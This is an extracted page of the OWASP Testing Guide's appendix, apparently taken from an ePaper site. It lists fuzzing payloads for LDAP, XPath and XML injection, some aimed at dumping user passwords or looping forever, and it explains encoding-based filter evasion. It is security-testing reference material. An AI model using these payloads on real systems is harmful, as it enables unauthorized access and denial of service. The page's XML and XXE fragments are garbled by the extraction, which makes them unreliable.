4.0
1NSchAb
1NSchAb
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
221<br />
LDAP Injection<br />
For details on LDAP Injection: Testing for LDAP Injection<br />
|<br />
!<br />
(<br />
)<br />
%28<br />
%29<br />
&<br />
%26<br />
%21<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
*()|%26’<br />
admin*<br />
admin*)((|userPassword=*)<br />
*)(uid=*))(|(uid=*<br />
XPATH Injection<br />
For details on XPATH Injection: Testing for XPath Injection<br />
‘+or+’1’=’1<br />
‘+or+’’=’<br />
x’+or+1=1+or+’x’=’y<br />
/<br />
/<br />
/ *<br />
*/*<br />
@*<br />
count(/child::node())<br />
x’+or+name()=’username’+or+’x’=’y<br />
XML Injection<br />
Details on XML Injection here: Testing for XML Injection<br />
var n=0;while(true){n++;}]]><br />
SCRIPT]]>alert(‘gotcha’);/<br />
SCRIPT]]><br />
<br />
]>&xee;<br />
]>&xee;<br />
]>&xee;<br />
]>&xee;<br />
OWASP Testing Guide Appendix D:<br />
Encoded Injection<br />
Background<br />
Character encoding is the process of mapping characters, numbers<br />
and other symbols to a standard format. Typically, this is done to create<br />
a message ready for transmission between sender and receiver.<br />
It is, in simple terms, the conversion of characters (belonging to<br />
different languages like English, Chinese, Greek or any other known<br />
language) into bytes. An example of a widely used character encoding<br />
scheme is the American Standard Code for Information Interchange<br />
(ASCII) that initially used 7-bit codes. More recent examples of encoding<br />
schemes would be the Unicode UTF-8 and UTF-16 computing<br />
industry standards.<br />
In the space of application security and due to the plethora of encoding<br />
schemes available, character encoding has a popular misuse.<br />
It is being used for encoding malicious injection strings in a way that<br />
obfuscates them. This can lead to the bypass of input validation filters,<br />
or take advantage of particular ways in which browsers render<br />
encoded text.<br />
Input Encoding – Filter Evasion<br />
Web applications usually employ different types of input filtering<br />
mechanisms to limit the input that can be submitted by the user. If<br />
these input filters are not implemented sufficiently well, it is possible<br />
to slip a character or two through these filters. For instance, a<br />
/ can be represented as 2F (hex) in ASCII, while the same character<br />
(/) is encoded as C0 AF in Unicode (2 byte sequence). Therefore, it is<br />
important for the input filtering control to be aware of the encoding<br />
scheme used. If the filter is found to be detecting only UTF-8 encoded<br />
injections, a different encoding scheme may be employed to bypass<br />
this filter.<br />
Output Encoding – Server & Browser Consensus<br />
Web browsers need to be aware of the encoding scheme used to coherently<br />
display a web page. Ideally, this information should be provided<br />
to the browser in the HTTP header (“Content-Type”) field, as<br />
Content-Type: text/html; charset=UTF-8<br />
shown below:<br />
<br />
or through HTML META tag (“META HTTP-EQUIV”), as shown below:<br />
It is through these character encoding declarations that the browser<br />
understands which set of characters to use when converting bytes to<br />
characters. Note that the content type mentioned in the HTTP header<br />
has precedence over the META tag declaration.<br />
CERT describes it here as follows:<br />
Many web pages leave the character encoding (“charset” parameter<br />
in HTTP) undefined. In earlier versions of HTML and HTTP, the character<br />
encoding was supposed to default to ISO-8859-1 if it wasn’t<br />
defined. In fact, many browsers had a different default, so it was not<br />
possible to rely on the default being ISO-8859-1. HTML version 4 legitimizes<br />
this - if the character encoding isn’t specified, any character